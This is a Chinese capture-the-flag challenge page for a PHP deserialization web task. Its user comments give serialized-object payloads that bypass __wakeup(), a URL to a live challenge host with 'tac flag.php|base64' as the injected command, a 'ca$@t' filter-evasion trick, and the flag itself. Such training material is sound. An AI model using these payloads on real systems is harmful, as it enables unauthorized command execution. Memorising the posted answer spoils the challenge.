安慰奖WEB 未解决

分数: 35 金币: 5
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 2033
提  示:
描  述:
flag{}
评论
不会编程的崽 1年前

<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>

回复 0

不会编程的崽 1年前

O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

c41vin 2年前

0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6

回复 0

wxy1343 2年前

http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}

回复 0

wxy1343 2年前

flag{Unser1alize_and_2CE_Add}

回复 0

yuanyipaceandlove 2年前

class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;

回复 0

15683956189 2年前

特别要注意下url编码的问题

回复 0

泡椒控卫 2年前

https://blog.csdn.net/m0_57954651/article/details/127866733

回复 0

追风亚索 2年前

flag{Unser1alize_and_2CE_Add},flag是不是没变

回复 0

笨笨笨蛋 2年前

只要序列化的中的成员数大于实际成员数,即可绕过,虽然不是很懂,但是对这个有一个印象了 dirsearch很实用哦~

回复 2

WriteUp

image
小赵同学

3 金币

评分(3)

解题动态

smtall 攻破了该题 1天前
LostDawn 攻破了该题 1天前
yy56 攻破了该题 2天前
ZZZZZZYx 攻破了该题 4天前
The-Beacon 攻破了该题 4天前
liuweiak007 攻破了该题 5天前
小坑西1 攻破了该题 5天前
Lidisheng2027 攻破了该题 7天前
NNuuNN 攻破了该题 7天前
2424291112 攻破了该题 7天前
Subuloy 攻破了该题 8天前
yiwuxiaobawang 攻破了该题 8天前
soulchild 攻破了该题 10天前
yangbing8555 攻破了该题 10天前
Cyberrui 攻破了该题 12天前
13567024312 攻破了该题 12天前
卡卡罗特M 攻破了该题 14天前
admin1322 攻破了该题 14天前
JJJleo 攻破了该题 14天前
烛火 攻破了该题 15天前
问题反馈